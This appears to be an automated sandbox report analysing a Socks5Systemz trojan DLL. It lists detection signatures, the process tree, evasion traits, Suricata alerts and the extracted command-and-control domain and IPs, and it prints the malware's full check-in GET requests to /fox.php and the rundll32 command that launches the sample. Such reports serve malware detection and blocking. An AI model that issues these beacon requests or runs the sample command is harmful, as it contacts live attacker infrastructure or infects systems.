Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cNF6fXdjPw.dll

Overview

General Information

Sample name:cNF6fXdjPw.dll
renamed because original name is a hash value
Original sample name:76436512E3E3A9DCA38F5EAF312FE323.dll
Analysis ID:1575251
MD5:76436512e3e3a9dca38f5eaf312fe323
SHA1:503af6ad7617f847abbe509a907944f0e9213505
SHA256:7d4ea4e69143df3f0f8fb9e4dee13c5251c4b1810d6b3a8626195906f00c0a49
Tags:dllSocks5Systemzuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7584 cmdline: loaddll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7636 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7652 cmdline: rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 list": ["gjeqiox.com"]}
SourceRuleDescriptionAuthorStrings
cNF6fXdjPw.dllJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: loaddll32.exe PID: 7584JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.loaddll32.exe.6ceb0000.0.unpackJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-15T00:48:27.168072+010020494671A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
          2024-12-15T00:48:40.305084+010020494671A Network Trojan was detected192.168.2.44978794.232.249.18780TCP
          2024-12-15T00:48:53.445782+010020494671A Network Trojan was detected192.168.2.44981794.232.249.18780TCP
          2024-12-15T00:49:12.194727+010020494671A Network Trojan was detected192.168.2.449874185.237.206.12980TCP
          2024-12-15T00:49:16.187683+010020494671A Network Trojan was detected192.168.2.449874185.237.206.12980TCP
          2024-12-15T00:50:17.587473+010020494671A Network Trojan was detected192.168.2.450013185.237.206.12980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-15T00:48:27.168072+010020494681A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
          2024-12-15T00:48:40.305084+010020494681A Network Trojan was detected192.168.2.44978794.232.249.18780TCP
          2024-12-15T00:48:53.445782+010020494681A Network Trojan was detected192.168.2.44981794.232.249.18780TCP
          2024-12-15T00:49:12.194727+010020494681A Network Trojan was detected192.168.2.449874185.237.206.12980TCP
          2024-12-15T00:49:16.187683+010020494681A Network Trojan was detected192.168.2.449874185.237.206.12980TCP
          2024-12-15T00:50:17.587473+010020494681A Network Trojan was detected192.168.2.450013185.237.206.12980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-15T00:48:40.305084+010028290081Malware Command and Control Activity Detected192.168.2.44978794.232.249.18780TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: cNF6fXdjPw.dllAvira: detected
          Source: loaddll32.exe.7584.0.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["gjeqiox.com"]}
          Source: cNF6fXdjPw.dllReversingLabs: Detection: 76%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: cNF6fXdjPw.dllJoe Sandbox ML: detected
          Source: cNF6fXdjPw.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: cNF6fXdjPw.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49759 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49759 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49787 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49787 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2829008 - Severity 1 - ETPRO MALWARE W32/Teamspy Variant Checkin : 192.168.2.4:49787 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49874 -> 185.237.206.129:80
          Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49874 -> 185.237.206.129:80
          Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49817 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49817 -> 94.232.249.187:80
          Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50013 -> 185.237.206.129:80
          Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50013 -> 185.237.206.129:80
          Source: Malware configuration extractorURLs: gjeqiox.com
          Source: global trafficTCP traffic: 192.168.2.4:49878 -> 45.155.250.225:1074
          Source: Joe Sandbox ViewIP Address: 94.232.249.187 94.232.249.187
          Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
          Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: unknownTCP traffic detected without corresponding DNS query: 45.155.250.225
          Source: unknownTCP traffic detected without corresponding DNS query: 45.155.250.225
          Source: unknownTCP traffic detected without corresponding DNS query: 45.155.250.225
          Source: unknownTCP traffic detected without corresponding DNS query: 45.155.250.225
          Source: unknownTCP traffic detected without corresponding DNS query: 45.155.250.225
          Source: unknownTCP traffic detected without corresponding DNS query: 45.155.250.225
          Source: unknownUDP traffic detected without corresponding DNS query: 45.155.250.90
          Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.8
          Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.8
          Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.8
          Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.8
          Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.8
          Source: unknownUDP traffic detected without corresponding DNS query: 45.155.250.90
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEB3EDF InterlockedIncrement,WSARecv,WSAGetLastError,0_2_6CEB3EDF
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficHTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
          Source: global trafficDNS traffic detected: DNS query: eeikzox.ua
          Source: global trafficDNS traffic detected: DNS query: gjeqiox.com
          Source: loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/
          Source: loaddll32.exe, 00000000.00000002.3600686711.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353
          Source: loaddll32.exe, 00000000.00000002.3600686711.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353
          Source: loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e
          Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEC8003: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,0_2_6CEC8003
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEB68FD0_2_6CEB68FD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED0C520_2_6CED0C52
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED6C290_2_6CED6C29
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD0_2_6CEFBDBD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED7D9F0_2_6CED7D9F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED2E0A0_2_6CED2E0A
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEDAE020_2_6CEDAE02
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEDA8900_2_6CEDA890
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEDD9E00_2_6CEDD9E0
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED796A0_2_6CED796A
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED3BCA0_2_6CED3BCA
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEDC5D30_2_6CEDC5D3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CECF5380_2_6CECF538
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED75350_2_6CED7535
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEC775F0_2_6CEC775F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED711D0_2_6CED711D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEDD3E90_2_6CEDD3E9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEDB3740_2_6CEDB374
          Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6CEDD8F0 appears 46 times
          Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6CED12F0 appears 37 times
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892
          Source: cNF6fXdjPw.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: classification engineClassification label: mal96.troj.evad.winDLL@7/8@7/3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEC90D8 FormatMessageA,GetLastError,0_2_6CEC90D8
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6335e12e-6eec-4970-8883-474590d3496dJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
          Source: cNF6fXdjPw.dllReversingLabs: Detection: 76%
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: cNF6fXdjPw.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: cNF6fXdjPw.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: cNF6fXdjPw.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: cNF6fXdjPw.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: cNF6fXdjPw.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: cNF6fXdjPw.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEC8107 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,0_2_6CEC8107
          Source: cNF6fXdjPw.dllStatic PE information: real checksum: 0xb24e5 should be: 0xb24e0
          Source: cNF6fXdjPw.dllStatic PE information: section name: .vlizer
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0A5B0 push ecx; mov dword ptr [esp], ebx0_2_6CF0A5BC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0A5B0 push edx; mov dword ptr [esp], esi0_2_6CF0A5DC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0A5B0 push ecx; mov dword ptr [esp], 25F31F85h0_2_6CF5803E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0A5B0 push 20DA6B82h; mov dword ptr [esp], esi0_2_6CF5809E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0A5B0 push 18607D66h; mov dword ptr [esp], ecx0_2_6CF580C3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF02CB4 push eax; mov dword ptr [esp], ebx0_2_6CF02CCF
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF59CB8 push edi; mov dword ptr [esp], 0F7F8545h0_2_6CF59D14
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF59CB8 push ebx; mov dword ptr [esp], 1AFAE18Fh0_2_6CF59D35
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF3FC4C push edx; mov dword ptr [esp], 40000000h0_2_6CF3FC6D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF3FC4C push ebp; mov dword ptr [esp], ecx0_2_6CF3FC7B
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF3FC4C push 6E3A80FFh; mov dword ptr [esp], ebx0_2_6CF3FC92
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF02C33 push 364FDF85h; mov dword ptr [esp], ebx0_2_6CF02C38
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF02C33 push ebp; mov dword ptr [esp], 138372B4h0_2_6CF02C54
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF02C33 push 57E07055h; mov dword ptr [esp], ecx0_2_6CF02C70
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push 006B061Dh; mov dword ptr [esp], esi0_2_6CEFBDC2
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push 7789C0A6h; mov dword ptr [esp], ebx0_2_6CEFBDE4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push 38D8E0CEh; mov dword ptr [esp], ecx0_2_6CEFBE15
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push ebx; mov dword ptr [esp], 51D38DFFh0_2_6CEFBE31
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push 3979AE49h; mov dword ptr [esp], eax0_2_6CEFBE4E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push esi; mov dword ptr [esp], ecx0_2_6CEFBE60
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEFBDBD push esi; mov dword ptr [esp], 1F43E62Ah0_2_6CF32A5E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF04D91 push ecx; mov dword ptr [esp], 702DDE1Bh0_2_6CF5C07A
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF04D91 push 0EF84AA9h; mov dword ptr [esp], edx0_2_6CF5C0BD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF04D91 push 592BBC36h; mov dword ptr [esp], ebp0_2_6CF5C14F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0AEF0 push esi; mov dword ptr [esp], ebp0_2_6CF58E51
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF0AEF0 push ecx; mov dword ptr [esp], edi0_2_6CF58F33
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF59EBC push ebp; mov dword ptr [esp], esi0_2_6CF59F1D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF04E44 push 61B61919h; mov dword ptr [esp], eax0_2_6CF04E8F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF04E44 push ecx; mov dword ptr [esp], eax0_2_6CF04EA7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF02FE4 push 692763DEh; mov dword ptr [esp], edi0_2_6CF03018
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CF02FE4 push esi; mov dword ptr [esp], ecx0_2_6CF03058
          Source: cNF6fXdjPw.dllStatic PE information: section name: .vlizer entropy: 7.949279852498222

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive00_2_6CEC8003

          Boot Survival

          barindex
          Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive00_2_6CEC8003
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED0C52 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6CED0C52
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
